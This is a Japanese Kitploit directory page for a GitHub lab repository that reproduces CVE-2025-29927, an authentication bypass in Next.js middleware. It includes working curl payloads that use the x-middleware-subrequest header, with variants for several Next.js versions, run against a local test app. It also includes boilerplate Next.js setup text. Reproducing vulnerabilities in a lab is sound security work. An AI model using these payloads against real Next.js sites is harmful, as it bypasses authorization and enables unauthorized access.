Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
ツール/GitHubGitHub/sugib3o/vulnerable-nextjs-14-cve-2025-29927
認証と認可脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubsugib3o/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
147ヶ月前未レビュー

CVE-2025-29927 認証バイパスの再現

このリポジトリは、next パッケージにおける CVE-2025-29927 脆弱性の再現です。

再現方法

  1. 以下の手順に従って、Next.js アプリケーションをクローンして実行します
  2. 認証により /api/hello エンドポイントへのアクセスが拒否されることをテストします
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. トークンが提供された場合に認証が機能することをテストします
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. また、特別な x-middleware-subrequest ヘッダーに middleware を5回入れ子にすることでバイパスすることもできます:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

古いバージョンの Next.js における CVE-2025-29927 の悪用

Next.js 12 および 13 では、ミドルウェアファイルの命名規則が異なり (_middleware.js)、Next.js 14 で middleware.js に変更されました。この脆弱性は、古いバージョンでは _middleware.js ファイルを使用することで悪用可能です。

例えば、Next.js のバージョンとルーティングの規則に応じて、以下のペイロードが適用されます:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (Next.js 12.2 で、middleware.js ファイルがアプリのルートにあり、pages ディレクトリ内にない場合)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (Next.js 11 から 12.2 まで)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

はじめに

まず、開発サーバーを起動します:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

ブラウザで http://localhost:3000 を開くと結果が表示されます。

app/page.js を編集することでページの編集を開始できます。ファイルを編集するとページが自動更新されます。

このプロジェクトは、next/font を使用して、Vercel の新しいフォントファミリー Geist を自動的に最適化して読み込みます。

詳細

Next.js の詳細については、以下のリソースを参照してください:

  • Next.js Documentation - Next.js の機能と API について学ぶ。
  • Learn Next.js - インタラクティブな Next.js チュートリアル。

Next.js GitHub リポジトリ をご覧ください。フィードバックや貢献をお待ちしています!

Vercel へのデプロイ

Next.js アプリをデプロイする最も簡単な方法は、Next.js の開発元が提供する Vercel Platform を使用することです。

詳細については、Next.js デプロイメントドキュメント をご覧ください。

ツールをダウンロード